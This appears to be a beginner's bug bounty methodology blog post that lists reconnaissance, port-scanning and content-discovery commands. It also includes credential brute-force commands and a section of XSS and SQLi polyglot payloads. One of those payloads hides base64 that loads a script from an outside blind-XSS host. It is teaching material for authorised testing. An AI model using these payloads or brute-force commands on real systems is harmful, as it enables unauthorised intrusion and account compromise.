Bug Hunting Methodology (part-1)Updated on 4-Jan-2020

Shankar Ramakrishnan
9 min readFeb 6, 2019



Hi I am Shankar Ramakrishnan (@trapp3r_hat) from India. I hope you all doing good. I am a security researcher from the last few years. Yes absolutely am doing bug bounty in the part-time because I am working as a Lead Security Consultant at Peneto Labs Pvt Ltd.

In this write up I am going to describe the path I walked through the bug hunting from the beginner level. This write-up is purely for new comers to the bug bounty community.

Note: Here I have written the tools and commands for your reference

These are personally collected information from public and my daily used tools while hunting

Useful YouTube Channels for learning

Why this writeup? (Contribution to the community)

Most of the peoples are asking me about the bug bounty testing methodology and how to find bugs on the targets and where I can start with the hunting.Every time I shared the videos and the write-ups to the noob guys in the community. For this reason I have planned to make this write-up.

Pre-requisites Skills:

Linux basics

Basic idea about the HTTP protocols and its headers(Request and Response)


How to choose our target ?

We can choose our targets from bug bounty platforms like Bugcrowd, Hackerone,Zerocopter, etc,

Or we can find targets from the google by searching for responsible disclosure policy of a website.

We have a target then how to start ??

If you have chosen your target, then you should start finding the subdomain of the target.

or we can start with the IP blocks of the targets which we can get from the ASN (some of the websites are mentioned in below)

Why we need subdomain?

Sometimes targeting the main domain is not possible to find bugs which will frustrated to the noobs. Because the top or other researchers are already found and reported the bugs to the target. For newbie should start with the other subdomains.

How to find Sub-domains?

As per my recon I am using the following tools to find the sub-domains for the target. (Commands are given below)






In other words we can find subdomains using certificate transparency methodology

From crt.sh, censys.io,shodan.io, google certificate transparency, facebook certificate transparency, and even CSP header etc.

For more info:

Sub-domain Takeover Vulnerability:

In the community have already publish lots of write-ups for sub-domain takeover vulnerability So let me skip this part. If anybody needs this then let me know.


Discovering Target Using ASN (IP Blocks):






Brand / TLD Discovery:
— — — — — — — — — —

This will increase the target scope by searching for a Aquiasition of a target

Acquisition — -> crunchbase, wikipedia

link discovery — ->burp spidering

weighted& reverse tracker → domlink, builtwith


Trademark In Google: ” “Tesla © 2016” “Tesla © 2015” “Tesla © 2017” inurl:tesla

Discovering New Targets

— — — — —
amass -json out.json -d example.com

— — — — — —

./subfinder -d example.com -o ./output.txt oT


docker run -v $HOME/.config/subfinder:/root/.config/subfinder -it subfinder -d example.com -o output.txt -nw -oA > uber.com.txt

— — — — —
time gobuster -m dns -u $TARGET.com -t 100 -w all.txt

time ./subbrute.py /root/work/bin/all.txt $TARGET.com | ./bin/massdns -r resolvers.txt -t A -a -o -w massdns_output.txt -

— — — — — — —
aquatone-discover — domain example.com — threads 25

aquatone-scan — domain example.com — ports huge -t 30

aquatone-gather — domain example.com — threads 25


Subdomain Enumberation
— — — — — — — — — — — — — — — — — — — — —

These techniques are given by the awesome man Bharath

Here you can find the original scripts https://github.com/appsecco/bugcrowd-levelup-subdomain-enumeration

Note: Kindly replace the API key used inside the scripts which may be an invalid which results in less amount of subdomains


Slides are available at: https://speakerdeck.com/yamakira/esoteric-sub-domain-enumeration-techniques


Video is available at:

Subdomain Enumeration with the SPF record

python assets_from_SPF.py google.com

Using Censys
— — — — — — — — — —
python censys_enumeration.py domain.txt

Using CSP
— — — — — — — — — —
python csp_parser.py google.com -r


Rapid 7 Forward DNS dataset
— — — — — — — — — — — — — — — —

curl -silent https://scans.io/data/rapid7/sonar.fdns_v2/20170417-fdns.json.gz | pigz -dc | grep “.icann.org” | jq

— — — — — —
python dnsrecon.py -n ns1.insecuredns.com -d insecuredns.com -D subdomains-top1mil-5000.txt -t brt

— — — — — —
python altdns.py -i icann.domains -o data_output -w icann.words -r -s results_output.txt


Zone transfer using dig
— — — — — — — — — — —

dig +multi AXFR @ns1.insecuredns.com insecuredns.com
— — — — — — — — —
dig +multi +dnssec A paypal.com

dig +dnssec @ns1.insecuredns.com firewall.insecuredns.com
Zone walking NSEC — LDNS
— — — — — — — — — — — — —
$ ldns-walk @name_server domain_name

Zone walking NSEC — Dig
— — — — — — — — — — — —
You can list all the sub-domains by following the linked list of NSEC records of existing domains.

$ dig +short NSEC api.nasa.gov

$ dig +short NSEC apm.nasa.gov

Extracting the sub-domain from NSEC
— — — — — — — — — — — — — — — — — —

dig +short NSEC api.nasa.gov | awk ‘{print $1;}’

Zone walking NSEC3
— — — — — — — — — — —
Zone walking NSEC3 protected zone using nsec3walker:

# Collect NSEC3 hashes of a domain
$ ./collect insecuredns.com > insecuredns.com.collect

# Undo the hashing, expose the sub-domain information.
$ ./unhash < insecuredns.com.collect > insecuredns.com.unhash


Zone walking NSEC3
— — — — — — — — — —
# Checking the number of sucessfully cracked sub-domain hashes
$ cat icann.org.unhash | grep “icann” | wc -l

# Listing only the sub-domain part from the unhashed data
$ cat icann.org.unhash | grep “icann” | awk ‘{print $2;}’


dig +short TXT icann.org | grep spf



./bin/massdns -r resolvers.txt -t AAAA -w results.txt domains.txt


Port Scanning:

The port scanning is very important to find the target which is running in non-standard or standard ports.

For port scanning I have used NMAP and Masscan and Aquatone scan.

Then some researcher start checking for sub-domain takeover vulnerability once they found sub-domains which running on the standard or non-standard ports.

Enumerating Targets(Port Scanning)

— — — — —

masscan -p1–65535 -iL $TARGET_LIST — max-rate 10000 -oG $TARGET_OUTPUT


— — — —

nmap -S -d — max-scan-delay 10 -oA logs/tcp-allports-%T-%D -iL tcp-allports-1M-ips — max-retries 1 — randomize-hosts -p- -PS21,22,23,25,53,80,443 -T4 — min-hostgroup 256

For more information about the port scanning methodology by Nmap which is explained in the below video


Visual Identification

This part will help us to find a application which is running on standard or non-standard ports on the target machine.

The following tools are grabbing banner if they found on the target machine which is running on specific ports. That will help us to sort list our target sub-domains.

— — — — — —
eyewitness -f urls.txt — web


Wayback Enumeration →> waybackurl

This technology will help us if we seen any one of the HTTP responses like 401,403,404. This will show you the old stored data using Archive.

Here we can find some sensitive information even the target page is not currently accessible.

— — — — — — —

php recon -y2012 — url=https://github.com -t10 (fetch snapshot of year 2012 of github with 10 threads)

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — -
python waybackurls.py — help

— — — — — —
./waybackunifier — help

Parsing JavaScript

Parsing JS is very useful to find the directories which is used by the target. we can use these type of tools instead of brute-forcing the directory list on the target

Note: Brute-Forcing of directory also good thing to do. Always use the multiple techniques to find the directory from the targets

— — — — — — — —

Run handler.py and then visit http://localhost:8008.
— — — — — —
python linkfinder.py -i https://example.com -d /* Will analyze the entire domain’s JS files */

python linkfinder.py -i https://example.com/1.js -o results.html

— — — — — —

python3 dirsearch.py — help


dirb https://target.com/

And Use DirBuster Also

Content Discovery
Burp content discovery
Robots disallowed

Seclists / RAFT / Digger wordlists will help us to find the wordlists for appropriate attacks

Parameter Bruting?

Parameter brute-forcing will helpful to find the vulnerabilities. Becoz there is no protection on those parameters compared to the usual one. You should try this methods once.
— — — — — —

parameth.py -u example.com/login.php -t 30 -o output.txt


Credential Bruteforce

These tools are having the ability to brute-force the different type of protocols like http, ssh,smtp, etc

python brutespray.py — file nmap.gnmap -U /usr/share/wordlist/user.txt -P /usr/share/wordlist/pass.txt — threads 5 — hosts 5

— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
medusa -h -u “admin” -P c:/file/directory/hugewordlist.txt -M http


Technology Identification and Vulnerability findings:

Here I used Wappalyzer and build with addons on the browsers. Whatweb tool also I used to find the what technologies they used on the target.

The following tools to find technologies and technology based vulnerabilities on the target

— — — —

wpscan — url www.example.com

— — — — — —
cmsmap.py -t https://example.com -o output.txt

cmsmap.py -t https://example.com -u admin -p passwords.txt

cmsmap.py -k hashes.txt -w passwords.txt


Github Recon to find juicy information about the target

We can use GitHub to find sensitive information like RSA key,API Key, Source-code with the default credentials and the databases etc. The following tools will reduce the analysis time. but the manual finding is always good.


./gitrob google

To see the result go to browser and type localhost:9393


trufflehog https://github.com/SeppPenner/postgres.git


Git Repo DORKS
— — — — — — — —



How to start testing for a bug ??

The testing is based on our opinion. some of them start with the xss and other vulnerabilities which we can easily found from the target.

Still you are stuck with the testing for a bug means you can start reading the following books which always helpful for Bug hunter or Application Penetration Tester.




I hope these books are very helpful for how to test for a bugs

Polyglot payloads:

An XSS polyglot can be generally defined as any XSS vector that is executable within various injection contexts in its raw form.

— — —

%3C!%27/*!%22/*!\%27/*\%22/* — !%3E%3C/Title/%3C/script/%3E%3CInput%20Type=Text%20Style=position:fixed;top:0;left:0;font-size:999px%20*/;%20Onmouseenter=confirm`1`%20//%3E#

<!’/*!”/*!\’/*\”/* — !></Title/</script/><Input Type=Text Style=position:fixed;top:0;left:0;font-size:999px */; Onmouseenter=confirm`1` //>#

jaVasCript:/*-/*`/*\`/*’/*”/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/ — !>\x3csVg/<sVg/oNloAd=alert()//>\x3e

“>><marquee><img src=x onerror=confirm(1)></marquee>” ></plaintext\></|\><plaintext/onmouseover=prompt(1) ><script>prompt(1)</script>@gmail.com<isindex formaction=javascript:alert(/XSS/) type=submit>’ →” >
“></script><script>alert(1)</script>”><img/id=”confirm&lpar; 1)”/alt=”/”src=”/”onerror=eval(id&%23x29;>’”>”><img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vYnhzcy54c3MuaHQiO2RvY3VtZW50LmJvZHkuYXBwZW5kQ2hpbGQoYSk7 onerror=eval(atob(this.id))>

“ onclick=alert(1)//<button ‘ onclick=alert(1)//> */ alert(1)//

‘;alert(String.fromCharCode(88,83,83))//’;alert(String. fromCharCode(88,83,83))//”;alert(String.fromCharCode (88,83,83))//”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83)) </SCRIPT>

SQLi Polyglot:
— — — — — — — — —

SLEEP(1) /*‘ or SLEEP(1) or ‘“ or SLEEP(1) or “*/




SSTI (Server Side Template Injection)

— — — —
— — — —

./tplmap.py -u ‘http://www.target.com/page?name=John'


Special Thanks to:

Rahul Raj,Velayutham Selvaraj,havoc Guhan, Sreeram KL(This guy is awesome and one of my favorite & emerging hunter),Kishore T K,Sai Naik,Ali Razzaq, Vishnu Prasad, Pethu Raj,phwd, Jason Haddix, Frans Rosen, Mathias, Zseano,,James Kettle,Filedescriptor, Stok etc.

I always thank to every mates for providing their finding to the community.

Reference and I started with this following videos and I suggested to watch noobs to understand what is going on in Bug Hunting :



Bug bounty Tips:


Tools References:

Good writeups:

I am Planning to write Bug hunting Methodology part-2 about the burp plugins and how to use those tools while hunting. and I will add some pro-tips that works for me which I got from the twitter. Also I will add some good write-ups which I was inspired by the attack methodology which I collected from the community

Thanks & Regards,

Shankar Ramakrishnan

📝 Read this story later in Journal.

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Shankar Ramakrishnan

Senior Security Consultant | OSCP |Crest CRT |Crest CPSA |ISO 27001 |eWAPTX v2 |eJPT |CVE-2021-38642 | iOS | Android | GraphQL | Penetration Tester